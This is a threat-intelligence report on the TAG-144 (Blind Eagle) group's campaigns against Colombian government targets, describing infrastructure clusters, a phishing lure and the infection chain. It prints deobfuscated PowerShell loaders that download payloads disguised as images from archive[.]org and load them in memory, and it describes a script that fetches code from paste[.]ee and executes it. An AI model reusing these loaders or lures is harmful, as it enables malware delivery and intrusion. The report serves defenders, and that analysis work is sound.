{
	"id": "14e6d164-99f4-438e-94a0-52ae09401f01",
	"created_at": "2026-04-29T02:20:51.52744Z",
	"updated_at": "2026-04-29T08:22:34.126697Z",
	"deleted_at": null,
	"sha1_hash": "ddfb075f6b359d1ee826fda08c1afd1b8bce8d4f",
	"title": "TAG-144’s Persistent Grip on South American Organizations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "2025-08-25T15:18:08Z",
	"file_modification_date": "2025-08-25T15:18:25Z",
	"file_size": 4956660,
	"plain_text": "By Insikt Group®\r\nAugust 26, 2025\r\nTAG-144’s Persistent Grip on\r\nSouth American Organizations\r\nInsikt Group tracked five TAG-144\r\n(Blind Eagle) clusters with overlapping\r\nbut distinct TTPs, targeting many\r\nvictims, mainly in the Colombian\r\ngovernment, during 2024–2025.\r\nTAG-144 maintains extensive\r\ninfrastructure with VPS, Colombian\r\nISP IPs, and VPN-like servers hosting\r\ndomains via dynamic DNS services like\r\nduckdns[.]org, noip[.]com, and con-ip[.]\r\ncom, among others.\r\nTAG-144 uses various open-source and cracked RATs, delivered\r\nvia multi-stage chains using\r\nlegitimate internet services (LIS) and\r\nsteganography to hide malicious\r\ncontent and evade detection.\r\nCYBER\r\nTHREAT\r\nANALYSIS\n\nCYBER THREAT ANALYSIS\r\n \r\n \r\nNote: The analysis cut-off date for this report was July 21, 2025.\r\nExecutive Summary\r\nInsikt Group has identified five distinct activity clusters linked to TAG-144 (also known as Blind Eagle).\r\nThese clusters have operated at various times throughout 2024 and 2025, targeting a significant\r\nnumber of victims, primarily within the Colombian government across local, municipal, and federal\r\nlevels. Although the clusters share similar tactics, techniques, and procedures (TTPs) such as\r\nleveraging open-source and cracked remote access trojans (RATs), dynamic domain providers, and\r\nlegitimate internet services (LIS) for staging, they differ significantly in infrastructure, malware\r\ndeployment, and other operational methods. Insikt Group also found further evidence linking TAG-144\r\nto Red Akodon and identified various compromised Colombian government email accounts likely used\r\nin spearphishing campaigns.\r\n \r\nTo protect against TAG-144, security defenders should block IP addresses and domains tied to\r\nassociated RATs, flag and potentially block connections to unusual LIS, and deploy updated detection\r\nrules (YARA, Sigma, Snort) for current and historic infections. 
Other controls include implementing email\r\nfiltering and data exfiltration monitoring. See the Mitigations section for implementation guidance and\r\nAppendix B for a complete list of IoCs. In the long term, analysts should continuously monitor the\r\ncybercriminal ecosystem for emerging threats and adapt controls accordingly.\r\n \r\n1  CTA-2025-0826  Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nKey Findings\r\n●Insikt Group has tracked five distinct activity clusters associated with TAG-144 (Blind Eagle),\r\neach displaying overlapping yet varied TTPs and collectively targeting numerous victims,\r\nprimarily within the Colombian government, throughout 2024 and 2025.\r\n●TAG-144 appears to maintain an extensive operational infrastructure, comprising virtual private\r\nservers (VPS), IP addresses within Colombian ISP ranges, and servers that appear to function as\r\nVPN servers. These typically host domains registered through various dynamic DNS services\r\nsuch as duckdns[.]org, noip[.]com, and con-ip[.]com, among others.\r\n●TAG-144 has employed a wide array of open-source and cracked RATs, including AsyncRAT,\r\nDcRAT, REMCOS RAT, XWorm, and LimeRAT, among others. 
These payloads are typically\r\ndeployed through a multi-stage infection chain that leverages an expanding set of LIS and uses\r\nsteganography to obscure malicious content and evade detection.\r\n \r\nTable of Contents\r\nBackground .... 4\r\nThreat Analysis .... 6\r\nCluster 1 .... 7\r\nCluster 2 .... 10\r\nCluster 3 .... 12\r\nCluster 4 .... 12\r\nCluster 5 .... 13\r\nInfection Chain .... 14\r\nPhishing Email .... 14\r\nSVG Attachment .... 14\r\nStaging Process Using LIS .... 16\r\nObfuscation .... 17\r\nPowerShell Script .... 19\r\nVictimology .... 23\r\nOverlap with Red Akodon .... 24\r\nMitigations .... 25\r\nOutlook .... 26\r\nAppendix A: Cluster 1 IP Addresses .... 27\r\nAppendix B: Indicators of Compromise (IoCs) .... 28\r\nAppendix C: Cluster 1 Victims .... 41\r\nAppendix D: Cluster 2 IP Addresses .... 43\r\nAppendix E: “deadpoolstart”-Themed Domains Linked to Cluster 2 .... 44\r\nAppendix F: Cluster 2 Victims .... 46\r\nAppendix G: Cluster 3 IP Addresses .... 47\r\nAppendix H: Cluster 4 IP Addresses .... 48\r\nAppendix I: Cluster 5 Domains .... 49\r\nAppendix J: Original SVG Attachment .... 50\r\nAppendix K: MITRE ATT\u0026CK Techniques .... 51\r\n \r\nBackground\r\nTAG-144, also known as Blind Eagle, AguilaCiega, APT-C-36, and APT-Q-98, is a threat group that has\r\nbeen active since at least 2018, primarily targeting South America, especially Colombia. While the threat\r\ngroup’s overall motivation remains ambiguous, its activity reflects both cyber-espionage and financially\r\ndriven motivations. 
TAG-144’s primary focus appears to be on credential theft, evidenced by\r\nbanking-related keylogging and browser monitoring, alongside indications of espionage, such as\r\npersistently targeting government entities and using modified RATs with surveillance functions (1, 2).\r\n \r\nThe group’s primary targets include government institutions, especially judiciary and tax authorities,\r\nalongside financial entities, petroleum and energy companies, and organizations within the education,\r\nhealthcare, manufacturing, and professional services sectors (1, 2). Operations are mainly focused on\r\nColombia, with additional activity in Ecuador, Chile, and Panama, and occasional campaigns in North\r\nAmerica targeting Spanish-speaking users.\r\n \r\nInitial access typically occurs through spearphishing campaigns impersonating local government\r\nagencies, most notably Colombian authorities. These campaigns leverage themes such as debt\r\ncollection and judicial notifications to lure victims into opening malicious documents (1, 2). They have\r\noften used URL shorteners like cort[.]as, acortaurl[.]com, and gtly[.]to to conceal malicious links and\r\ntarget users geographically. TAG-144 employs geo-fencing and other detection evasion measures that\r\nblock access from outside Colombia or Ecuador, redirecting outsiders to official government websites.\r\nTAG-144 has consistently leveraged compromised email accounts in its spearphishing campaigns,\r\nincluding those associated with government entities and private individuals.\r\n \r\nTAG-144 leverages a range of commodity remote access trojans (RATs), including AsyncRAT, REMCOS\r\nRAT, DcRAT, njRAT, LimeRAT, QuasarRAT, BitRAT, and a Quasar variant known as BlotchyQuasar. 
Its\r\ntooling also involves crypters such as HeartCrypt, PureCrypter, and those developed by threat actors\r\nlike “Roda” and “pjoao1578”, with indicators pointing to the use of crypter-as-a-service offerings such\r\nas CryptersAndTools, which originates from Brazil. Additionally, it employs steganography techniques,\r\nembedding malicious payloads within image files to evade detection.\r\n \r\nTAG-144’s command-and-control (C2) infrastructure often incorporates IP addresses from Colombian\r\nISPs alongside virtual private servers (VPS) such as Proton666 and VPN services like Powerhouse\r\nManagement, FrootVPN, and TorGuard (1, 2). This setup is further enhanced by the use of dynamic DNS\r\nservices, including duckdns[.]org, ip-ddns[.]com, and noip[.]com. The threat group is suspected,\r\nthough not definitively confirmed, to use compromised routers, which are then repurposed as reverse\r\nproxies to obscure the true locations of their C2 servers and complicate attribution.\r\n \r\nThe threat group has consistently leveraged LIS, particularly during the payload staging phase. These\r\nservices include widely used platforms like Bitbucket, Discord, Dropbox, GitHub, Google Drive,\r\nPaste.ee, and lesser-known platforms such as undisclosed Brazilian image-hosting websites.\r\nAdditionally, the group has been observed using compromised accounts to host malicious content,\r\n \r\n4  CTA-2025-0826  Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nincluding a Google Drive folder tied to a compromised account associated with a regional Colombian\r\ngovernment organization.\r\n \r\nThe threat group's origin remains uncertain, though multiple studies suggest it operates within the\r\nUTC-5 or UTC-4 time zones (1, 2), consistent with countries like Colombia and Ecuador, with some\r\nresearch specifically pointing to Colombia as its base. Notably, technical artifacts have contained both\r\nSpanish- and Portuguese-language comments. 
The Spanish observed in the comments closely\r\nresembles the regional dialects commonly spoken in the targeted countries. Additionally, the threat\r\ngroup has been observed using tools and services tied to the Brazilian cybercriminal underground,\r\nindicating a possible connection with Brazilian threat actors.\r\n \r\nThree key factors set TAG-144 apart within the cybercriminal ecosystem. First, while globalization,\r\ncybercriminal collaboration, and hardware/software standardization have lowered barriers for threat\r\nactors to operate globally, threat actors, including TAG-144, often remain regionally focused due to\r\ncultural nuances, tacit knowledge, and persistence. Second, despite some tooling improvements,\r\nTAG-144 has largely relied on consistent techniques since its emergence. Its continued success,\r\nreflected in a high number of victims, underscores how well-established methods remain effective over\r\ntime. Lastly, TAG-144 exemplifies the increasingly blurred lines between cybercrime and espionage, a\r\ntrend that is likely to become even more prominent in the coming year. In this context, a comprehensive approach\r\nto tackling cyber threats becomes even more crucial, requiring improved defenses, deeper regional\r\nknowledge, and enhanced coordination.\r\n \r\nThreat Analysis\r\nInsikt Group identified five activity clusters associated with TAG-144 that were active between May\r\n2024 and July 2025 (see Figure 1). 
Activity periods were determined based on domain resolutions,\r\nsample submissions, and victim traffic, as observed through Recorded Future® Network Intelligence.\r\n \r\n \r\nFigure 1: Cluster activity timelines (Source: Recorded Future)\r\n \r\nThe following clusters have been observed:\r\n \r\n●Cluster 1, active from February through July 2025, comprises C2 IPs primarily associated with\r\nTorGuard VPN and one Colombian ISP hosting duckdns[.]org and, starting in July 2025,\r\nnoip[.]com domains with static resolution and minimal rotation. Cluster 1 is linked to DcRAT,\r\nAsyncRAT, and REMCOS RAT infections targeting Colombian government entities exclusively.\r\n●Cluster 2, active between September and December 2024, included C2 IPs tied to\r\nAS-COLOCROSSING, Colombian ISPs, and VULTR hosting duckdns[.]org, con-ip[.]com, and\r\nkozow[.]com domains. Cluster 2 is associated with AsyncRAT activity targeting the Colombian\r\ngovernment and entities in the education, defense, and retail sectors.\r\n●Cluster 3, active from September 2024 to July 2025, consists of C2 IPs linked to Colombian ISP\r\nUNE EPM hosting duckdns[.]org and, occasionally, con-ip[.]com domains. Cluster 3 is\r\nassociated with both AsyncRAT and REMCOS RAT deployments.\r\n●Cluster 4, active from May 2024 to February 2025, is notable for combining malware and\r\nphishing infrastructure attributed to TAG-144.\r\n \r\n6  CTA-2025-0826  Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\n●Cluster 5, active from March to July 2025, consists of C2 IPs linked to GLESYS (AS42708)\r\nhosting dynamically resolving duckdns[.]org domains. Cluster 5 is associated with LimeRAT and\r\na cracked AsyncRAT variant seen in Clusters 1 and 2.\r\n \r\nInsikt Group identified infrastructure overlaps between the clusters, establishing a connection among\r\nthem. 
Additionally, the clusters share notable similarities in TTPs, including infrastructure choices,\r\ndomain naming patterns, malware deployment, and the abuse of LIS. However, each cluster also\r\nexhibits distinct differences, which are explored in detail in the following sections of this report.\r\nCluster 1\r\nInfrastructure Analysis\r\n \r\nCluster 1, active from at least February through July 2025, comprises C2 IP addresses primarily linked\r\nto TorGuard VPN servers and, in one case, a Colombian ISP. This cluster typically hosts duckdns[.]org\r\nand, more recently, noip[.]com domains with specific naming patterns; it has also been observed\r\ndeploying DcRAT, AsyncRAT, and REMCOS RAT. The IP addresses linked to Cluster 1 are listed in\r\nAppendix A. The domains consistently resolve to the same static IP addresses over time, with minimal\r\nrotation observed within Cluster 1.\r\n \r\nThe subdomain names, likely generated by a domain generation algorithm (DGA), commonly include the\r\nword “envio” followed by a numeric part, as in, for example, envio16-05[.]duckdns[.]org. The names are\r\ndetectable via the regex in Figure 2 and are detailed in Appendix B.\r\n \r\nenvio[0-9\\-]{2,5}\\.duckdns\\.org\r\nFigure 2: Regex for suspected DGA linked to Cluster 1 (Source: Recorded Future)\r\n \r\nWhile prior research has suggested that the TorGuard VPN servers associated with Cluster 1 are used\r\nfor port forwarding, the exposure of C2 components, such as default transport layer security (TLS)\r\ncertificates tied to deployed malware families, indicates these IP addresses are likely dedicated VPN\r\ninstances directly controlled by TAG-144.\r\n \r\nIn addition to the TorGuard VPN servers, Cluster 1 includes IP addresses associated with Colombian\r\nISPs, such as Colombia’s primary provider, COLOMBIA TELECOMUNICACIONES S.A. E.S.P. 
While earlier\r\nreporting on Blind Eagle in 2020 suggested the possible use of compromised routers for C2\r\ninfrastructure, Insikt Group has not confirmed such activity for the observed IP addresses.\r\n \r\nNotably, several domains hosted on TorGuard VPN servers listed in Appendix A previously\r\nresolved to IP addresses belonging to Colombian ISPs, such as trabajonuevos[.]duckdns[.]org. These IP\r\naddresses and their associated domains are detailed in Appendix A. Similarly, certain domains, such as\r\ndiazpool14[.]duckdns[.]org, were previously hosted on IP addresses linked to GLESYS (AS42708), an\r\nASN identified in association with Cluster 5.\r\n \r\nAbuse of Legitimate Internet Services, Including lovestoblog[.]com\r\n \r\nAs is typical for TAG-144, Cluster 1 has leveraged various LIS during staging, such as Tagbox, Archive,\r\nPaste.ee, Discord, and BitBucket, and for the first time in TAG-144 activity, the free hosting platform\r\nlovestoblog[.]com by InfinityFree. More specifically, the subdomain sudo102[.]lovestoblog[.]com hosted\r\nseveral text files that loaded an encoded PowerShell script, which retrieved the next stage of the\r\ninfection chain from a JPG image hosted on archive[.]org. 
(See Figure 3 for the infection chain; line\r\nbreaks were added for readability.)\r\n \r\n$craploads = 'SilentlyContinue'\r\n$islamist =\r\n'https://archive[.]org/download/new_image_20250531_1942/new_image.jpg'\r\n$seiche = New-Object System.Net.WebClient\r\n$seiche.Headers.Add('User-Agent', 'Mozilla/5.0')\r\n[byte[]]$homophobes = $seiche.DownloadData($islamist)\r\n$rythmic = [System.Text.Encoding]::UTF8.GetString($homophobes)\r\n \r\n$protamphirhine = 'INICIO\u003e\u003e'\r\n$unrubberized = '\u003c\u003cFIM\u003e\u003e'\r\n$petrograph = $ither\r\n \r\n$formylation = $rythmic.IndexOf($protamphirhine)\r\n$inconveniency = $rythmic.IndexOf($unrubberized)\r\n \r\nif ($formylation -ne -1 -and $inconveniency -ne -1 -and $inconveniency -gt\r\n$formylation) {\r\n $formylation += $protamphirhine.Length\r\n $petrograph = $rythmic.Substring($formylation, $inconveniency -\r\n$formylation)\r\n}\r\n \r\n$higgsinos =\r\n'#x#.e13ba2379fd20168b9c460418b963234_oviuqra/moc.golbo#sevol.201odus//:p##h'\r\n$higgsinos = $higgsinos.Replace('#', 't')\r\n$petrograph = $petrograph.Replace('@', 'A')\r\n \r\n$MacArthur = [System.Convert]::FromBase64String($petrograph)\r\n$aginator = [Reflection.Assembly]::Load($MacArthur)\r\n \r\n$towelette = [dnlib.IO.Home].GetMethod('VAI').Invoke(\r\n $ither,\r\n [object[]]@(\r\n $higgsinos,\r\n '', '', '',\r\n 'MSBuild', '', '', '', '',\r\n 'C:\\Users\\Public\\Downloads',\r\n 'Mattagami',\r\n 'js', '', '',\r\n 'duparted',\r\n '2', ''\r\n )\r\n)\r\nFigure 3: Payload hosted on archive[.]org URL (Source: Recorded Future)\r\n \r\nAt least one text file hosted on sudo102[.]lovestoblog[.]com included comments in Portuguese (for\r\nexample, “Junta os comandos,” which translates to “Add the commands”), a characteristic previously\r\nobserved in connection with Blind Eagle (1, 2). 
This was suspected to indicate possible collaboration\r\nbetween the threat actor and external threat groups; however, it could also be explained by the\r\npresence of Portuguese-speaking members, code reuse, or intentional false flag operations.\r\n \r\nMalware\r\n \r\nInsikt Group observed Cluster 1 using both the “1.0.7” version of AsyncRAT and a variant labeled\r\n“CRACKED BY hxxps://t[.]me/xworm_v2”, which has the mutex AsyncMutex_6SI8OkPnk. xworm_v2 is\r\nan active Telegram channel with over 300 members, known for sharing and distributing cracked\r\nversions of paid software.\r\n \r\nFigure 4: Telegram channel hxxps://t[.]me/xworm_v2 (Source: Recorded Future)\r\nThe cracked version observed in connection with TAG-144 was linked to a threat actor tracked as Red\r\nAkodon in May 2024; it appeared again in June 2025 in a report potentially referencing the same threat\r\nactor based on observed TTPs, though without formal attribution.\r\n \r\nVictimology\r\n \r\nUsing Recorded Future Network Intelligence, Insikt Group identified a significant number of victims\r\nexclusively linked to the Colombian government associated with Cluster 1 (see Appendix C). Network\r\ncommunications, as observed by Recorded Future Network Intelligence, began in March 2025 and\r\nended in June 2025. Notably, the cessation of activity may indicate that the threat actors were either\r\nevicted, completed their objectives and withdrew voluntarily, or transitioned to other tooling and egress\r\npoints.\r\nAs shown in Appendix C, multiple victims were observed communicating with several C2 servers\r\nassociated with Cluster 1. This activity likely resulted from changes in DNS resolution for the C2\r\ndomains over time. 
In some instances, Insikt Group assesses that multiple infections occurred within\r\nthe same victim network, with all compromised systems communicating with the C2 infrastructure\r\nthrough a shared egress point. In some cases, Insikt Group was unable to conclusively identify the\r\nexact victim due to multiple entities sharing the same name.\r\n \r\nInfrastructure Management\r\n \r\nAlthough the exact infrastructure management methods used by TAG-144 for Cluster 1 remain unclear\r\nat this time, Insikt Group identified indications that the threat group may have leveraged a compromised\r\nMikrotik router as a proxy to communicate with the C2 servers over a port.\r\nCluster 2\r\nInfrastructure Analysis\r\n \r\nCluster 2, active from at least September to December 2024, comprises C2 IP addresses primarily\r\nlinked to AS-COLOCROSSING, Colombian ISP IP addresses, and, in at least one case, VULTR. It typically\r\nhosts duckdns[.]org or con-ip[.]com domains with specific naming patterns and has been observed\r\ndeploying AsyncRAT. In a few cases, Insikt Group also observed domains linked to the free dynamic\r\nDNS provider kozow[.]com. The IP addresses linked to Cluster 2 are listed in Appendix D.\r\n \r\nThe subdomain names, likely generated by a DGA, often consist of Spanish words, as in\r\npesosdepesoslibras[.]duckdns[.]org. Sometimes, they are followed by numbers, as in\r\npaseoencarro2024[.]con-ip[.]com. 
(For a detailed list of these subdomain names, see Appendix A.)\r\nNotably, many of the domains currently hosted on AS-COLOCROSSING IP addresses (see Appendix D)\r\nwere previously associated with IPs from Colombian ISPs, such as 179[.]14[.]8[.]26,\r\n181[.]131[.]217[.]255, 177[.]255[.]84[.]82, and 191[.]88[.]248[.]162, indicating they may have been reused\r\nacross different hosting infrastructures.\r\n \r\nIn addition to the Spanish-themed domains, Insikt Group identified a large set of DuckDNS and CON-IP\r\ndomains, likely generated by another DGA and all starting with the keyword “deadpoolstart,”\r\nfollowed by a four-digit number (see Appendix E). Notably, the con-ip[.]com domains resolve to the\r\nAS-COLOCROSSING IP address 64[.]188[.]9[.]172, while the duckdns[.]org domains all resolve to IP\r\naddresses belonging to Colombian ISPs.\r\n \r\nAbuse of Legitimate Internet Services\r\n \r\nSimilar to Cluster 1, Cluster 2 has also been observed leveraging various LIS during staging, including\r\nGitHub, Archive, Paste.ee, and more recently, the free hosting platform lovestoblog[.]com by\r\nInfinityFree, which ultimately led to an XWorm infection using the C2 domain\r\ndeadpoolstart2064[.]duckdns[.]org.\r\n \r\nInsikt Group also identified a payload named RELACIÓN DE SALDOS - CUENTA DE COBRO.pdf.exe\r\nassociated with Cluster 2, which staged its content via two GitHub Gist URLs linked to the account\r\nSmikeY666:\r\n \r\n● hxxps://gist[.]githubusercontent[.]com/SmikeY666/50447c53097f8884ffc754a8779fa2a3/raw\r\n● hxxps://gist[.]githubusercontent[.]com/SmikeY666/8504274482e8e688d9489b302bfbc45e/raw\r\n \r\nThe payload results in an AsyncRAT infection, with the malware reaching out to its C2 server,\r\ncococovid202420242024[.]duckdns[.]org, which resolved to IP address 64[.]188[.]9[.]175 as of\r\nDecember 26, 2024.\r\n \r\nNotably, the GitHub account 
“SmikeY666” included a link to a 2024 Vimeo video demonstrating an\r\nallegedly cracked version of SilverRAT, a Windows-based RAT that first appeared in 2023. It has been\r\ndistributed across various forums and appears to be developed by an individual or group using the alias\r\nAnonymous Arabic.\r\n \r\nMalware\r\n \r\nInsikt Group observed Cluster 2 using the AsyncRAT variant labeled “CRACKED BY\r\nhxxps://t[.]me/xworm_v2” with the mutex AsyncMutex_6SI8OkPnk. Additionally, the cluster deployed\r\nAsyncRAT samples featuring custom mutexes such as tempcookieess, tempcokies, tempcookiee,\r\nWinCookies, Cookies, and CookiesGoogleChrome, among others. These samples can be tracked via\r\nRecorded Future Malware Intelligence. At least some of the samples are encrypted using a crypter\r\nattributed to Roda, a tool associated with Blind Eagle activity.\r\n \r\nVictimology\r\n \r\nUsing Recorded Future Network Intelligence, Insikt Group identified nine victims associated with Cluster\r\n2, primarily linked to Colombian government entities, along with victims from the education, defense,\r\nand retail sectors, among others (see Appendix F). Network communications observed by Recorded\r\nFuture began in early October 2024 and ended in December 2024.\r\n \r\n \r\n11  CTA-2025-0826  Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nAs with Cluster 1, multiple infections were observed within some of the victim organizations linked to\r\nCluster 2, suggesting broader targeting or possible lateral movement. There is also evidence of victim\r\noverlap between Clusters 1 and 2. 
Furthermore, based on high volumes of network traffic from\r\nColombian ISP IP addresses to C2 ports during the relevant timeframes, the actual number of victims is\r\nlikely higher than what has been confirmed.\r\nCluster 3\r\nCluster 3, active from at least September 2024 to July 2025, comprises C2 IP addresses primarily\r\nlinked to the Colombian ISP UNE EPM, typically hosting duckdns[.]org or, in rare cases, con-ip[.]com\r\ndomains. Insikt Group has observed AsyncRAT as well as REMCOS RAT infections linked to Cluster 3.\r\nThe IP addresses linked to Cluster 3 are listed in Appendix G.\r\n \r\nThe subdomain names, likely generated using a DGA, often incorporate Spanish names, as in\r\nsebastiancorrea905040[.]duckdns[.]org, sometimes appended with numerical sequences. (For a\r\ndetailed list of these subdomain names, see Appendix B.) Notably, one of the domains associated with\r\nCluster 3, sebastianguerrero5040[.]con-ip[.]com, was observed resolving to the Cluster 2 IP address\r\n64[.]188[.]9[.]177 between at least September 11 and November 11, 2024.\r\n \r\nSimilar to Clusters 1 and 2, Cluster 3 has also been observed abusing multiple LIS, including Tagbox,\r\nArchive, and Paste.ee, among others.\r\nCluster 4\r\nCluster 4, active from at least May 2024 to February 2025, differs from the others in that it is not only\r\nassociated with malware infrastructure but also with phishing activity attributed to TAG-144. The IP\r\naddresses linked to Cluster 4 are listed in Appendix H. The full list of domains linked to the IP\r\naddresses in Appendix H is listed in Appendix A.\r\n \r\nThe phishing pages linked to Cluster 4 have been observed impersonating multiple banks, including\r\nBanco Davivienda, Bancolombia, and BBVA (see Figure 5). Notably, these lures differ from earlier ones\r\nattributed to TAG-144, which primarily impersonated government entities such as tax authorities or\r\njudicial bodies. 
Previous campaigns also appeared to target government-affiliated individuals or\r\norganizations, as evidenced by the victims associated with Clusters 1 and 2.\r\n \r\nFigure 5: Phishing pages linked to Cluster 4 (Source: URLScan, URLScan, URLScan)\n\nNotably, a phishing page impersonating BBVA and hosted on the domain keepz[.]duckdns[.]org\ncontained the IP address 181[.]131[.]217[.]139 in its document object model (DOM), as seen in Figure 6.\nThis IP was hosting the domains env2023nue[.]duckdns[.]org and chichichi01[.]duckdns[.]org in 2023.\nThe domain env2023nue[.]duckdns[.]org was publicly linked to APT-C-36 (Blind Eagle) and likely\nremained in use by the same threat actor, as it continued to host an open directory containing folders\nrelated to Banco Davivienda, Banco Colombia, Banco Caja Social, and others until at least March 14,\n2024, while being hosted on IP address 179[.]14[.]9[.]152. The domain chichichi01[.]duckdns[.]org\nserved as a C2 domain for AsyncRAT based on public reporting and was also hosted on IP address\n179[.]14[.]9[.]152 between March 22 and May 8, 2024.\n\n…\n\nDirección IP: 181[.]131[.]217[.]139\n\nCopyright©2023 Bancolombia S.A.\n\n…\nFigure 6: IP address left in the DOM of a phishing page (Source: URLScan)\n\nCluster 5\nCluster 5, active from at least March to July 2025, comprises C2 IP addresses primarily\nlinked to GLESYS (AS42708), typically hosting duckdns[.]org domains. The domains linked to Cluster 5\nare listed in Appendix I. Cluster 5 is the only cluster associated with the deployment of LimeRAT, which\nin this case uses the mutex 1e97ead369. The AsyncRAT variant linked to Cluster 5 is the same cracked\nversion identified in Clusters 1 and 2. 
Of note, the domains frequently resolve to changing IP addresses,\nwith those observed by Insikt Group detailed in Appendix B.\n\nSimilar to the other clusters, Cluster 5 has also been observed leveraging various LIS during staging,\nincluding Archive, Paste.ee, and Tagbox.\n\nInfection Chain\r\nPhishing Email\r\nInsikt Group identified an email sent to undisclosed recipients from a likely compromised email address,\r\nalcaldia[@]simacota-santander[.]gov[.]co, associated with the Mayor’s Office of Simacota in the\r\nSantander department of Colombia. Infections stemming from this email have been confirmed to result\r\nin AsyncRAT deployment, communicating with the C2 domain envio01[.]ddns[.]net, a domain previously\r\nlinked to Cluster 1.\r\n \r\nDe: Alcaldía Simacota Santander\r\n\u003cREDACTED\u003e\r\nEnviado el: martes, 1 de julio de 2025\r\n3:23 p. m.\r\nPara: undisclosed-recipients:\r\nAsunto: Cobro por intereses moratorios\r\n– Radicado 11001-28-05-03004\r\n \r\n¡Cuidado! este correo proviene de un\r\nusuario externo, no abras archivos\r\nadjuntos ni hagas clic en enlaces sin\r\nvalidar que el remitente y el\r\ncontenido sean seguros. Nunca\r\nentregues tu usuario ni contraseñas a\r\ntravés de enlaces.\r\n \r\nSe inicia ejecución por intereses\r\ncausados por pago extemporáneo.\r\nConsulte el archivo para liquidación\r\ndetallada.\r\n \r\n \r\nCordialmente,\r\nFrom: Simacota Santander Mayor's\r\nOffice \u003cREDACTED\u003e\r\nSent: Tuesday, July 1, 2025 3:23 p.m.\r\nTo: undisclosed-recipients:\r\nSubject: Collection of late payment\r\ninterest – File 11001-28-05-03004\r\n \r\nCaution! This email is from an\r\nexternal user. Do not open attachments\r\nor click on links without verifying\r\nthat the sender and content are\r\nsecure. 
Never provide your username or\r\npassword through links.\r\n \r\nA lawsuit has been filed for interest\r\naccrued due to late payment.\r\nSee the file for detailed settlement.\r\n \r\nSincerely,\r\nFigure 7: Text in phishing email linked to TAG-144 (left) and the English translation (right) (Source: Recorded Future)\r\nSVG Attachment\r\nThe email included an attachment named\r\nNotificacion_electronica_sentencia_preliminar_Departamento_Juridico_sxyebfiv.sv\r\ng, which has a SHA256 hash of\r\n04878a5889e3368c2cf093d42006ba18a87c5054f1464900094e6864f4919899. A translated version of\r\nthe attachment is presented in Figure 8, while the original Spanish version is available in Appendix J.\r\n \r\n14  CTA-2025-0826  Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nThe SVG content claims that a judicial process has been initiated against the recipient, outlines potential\r\npenalties, and contains a link purportedly leading to evidence and further legal details.\r\n \r\nFigure 8: Translated SVG file sent via spearphishing email (Source: Recorded Future)\r\n \r\n \r\n15  CTA-2025-0826  Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nStaging Process Using LIS\r\nThe link embedded within the SVG file is:\r\nhxxps://cdn[.]discordapp[.]com/attachments/1389692690454548634/1389692792590307338/\r\nNotificacion_electronica_sentencia_preliminar_Departamento_De-Justicia_01.js?ex=68658bc4\u0026i\r\ns=68643a44\u0026hm=057a0e76212bdd4c2da95e51ac7542f60ecbd440482ee186d474e1d783afd28\r\n8\u0026?id=75e6ea37-63e5-491a-a5e2-ad4c92667144\r\nA similar SVG sample was identified through a Malware Intelligence search for HTTP requests to\r\ncdn[.]discordapp[.]com that included “Notificacion” in the query string (see Figure 9).\r\n \r\nFigure 9: Additional sample found in Recorded Future Malware Intelligence (Source: Recorded Future)\r\nAlthough the cdn[.]discordapp[.]com link was inactive at the time of analysis, Insikt Group 
successfully extracted the downloaded JavaScript file from a PCAP capture. The file, named Notificacion_electronica_sentencia_preliminar_Departamento_De-Justicia_01.js, has the SHA256 hash 1226a8d066328a8b6f353c9d98f1dc8128bd84f3909ae1cc6811dc1adff33c81. The script contains a mix of malicious code and benign content related to the Microsoft Print Schema. The benign portion is displayed in Figure 10. The inclusion of benign content is likely an attempt to evade detection.\r\n \r\nFigure 10: Benign code portion contained in the JavaScript script (Source: Recorded Future)\r\nObfuscation\r\nFigure 11 shows the obfuscated malicious portion of the script. Notably, the code contains comments written in Portuguese, an aspect previously discussed in this report and also associated with activity linked to TAG-144.\r\n \r\nFigure 11: Obfuscated malicious code portion contained in the JavaScript script (Source: Recorded Future)\r\n \r\nThe variables voicelessness, classe, unwellness, and isostasy are obfuscated using junk characters and later deobfuscated via string replacement operations. These variables resolve to the following:\r\n \r\n● voicelessness and classe: MSXML2.ServerXMLHTTP.6.0\r\n● unwellness: hxxp://paste[.]ee/d/TrxwtHcC/0 (as observed via URLScan)\r\n● isostasy: GET\r\n \r\nThe script creates a ServerXMLHTTP object and issues a GET request to the specified paste[.]ee URL using the custom User-Agent MyCustomAgent/1.0. If the HTTP response returns status code 200, the response body is executed as JavaScript.\r\n \r\nThe SHA256 hash of the response body is 591744244c7ca9cea69cde263187efde3f65a157f8e5eb885ccc1f9e078b5572. 
This payload contains similar string obfuscation techniques and ultimately reconstructs strings to instantiate a shell object and execute a deobfuscated command line.\r\n \r\nFigure 12: Obfuscated payload with Portuguese comments (Source: Recorded Future)\r\nPowerShell Script\r\nThe deobfuscated command line is shown in Figure 13.\r\n \r\nFigure 13: Deobfuscated PowerShell command (Source: Recorded Future)\r\n \r\nThe executed command initiates PowerShell, decodes a Base64-encoded payload, and then runs the decoded content via the Invoke-Expression cmdlet. Figure 14 shows the deobfuscated string with line breaks added.\r\n \r\n$atropisomer = 'VkFJ';\r\n$pyrography = [System.Convert]::FromBase64String($atropisomer);\r\n$automaticities = [System.Text.Encoding]::UTF8.GetString($pyrography);\r\n$sycoma = 'Q2xhc3NMaWJyYXJ5MS5Ib21l';\r\n$repedation = [System.Convert]::FromBase64String($sycoma);\r\n$arboricultural = [System.Text.Encoding]::UTF8.GetString($repedation);\r\n \r\nAdd-Type -AssemblyName System.Drawing;\r\n$tormodont = 'https://archive[.]org/download/universe-1733359315202-8750/universe-1733359315202-8750.jpg';\r\n$sclere = New-Object System.Net.WebClient;\r\n$sclere.Headers.Add('User-Agent','Mozilla/5.0');\r\n$sorority = $sclere.DownloadData($tormodont);\r\n \r\n$backpack = [byte[]](0x42, 0x4D, 0x72, 0x6E, 0x37, 0x00, 0x00, 0x00, 0x00,\r\n0x00, 0x36, 0x00, 0x00, 0x00, 0x28, 0x00, 0x00, 0x00, 0x64, 0x00, 0x00, 0x00,\r\n0x4D, 0x2F, 0x00, 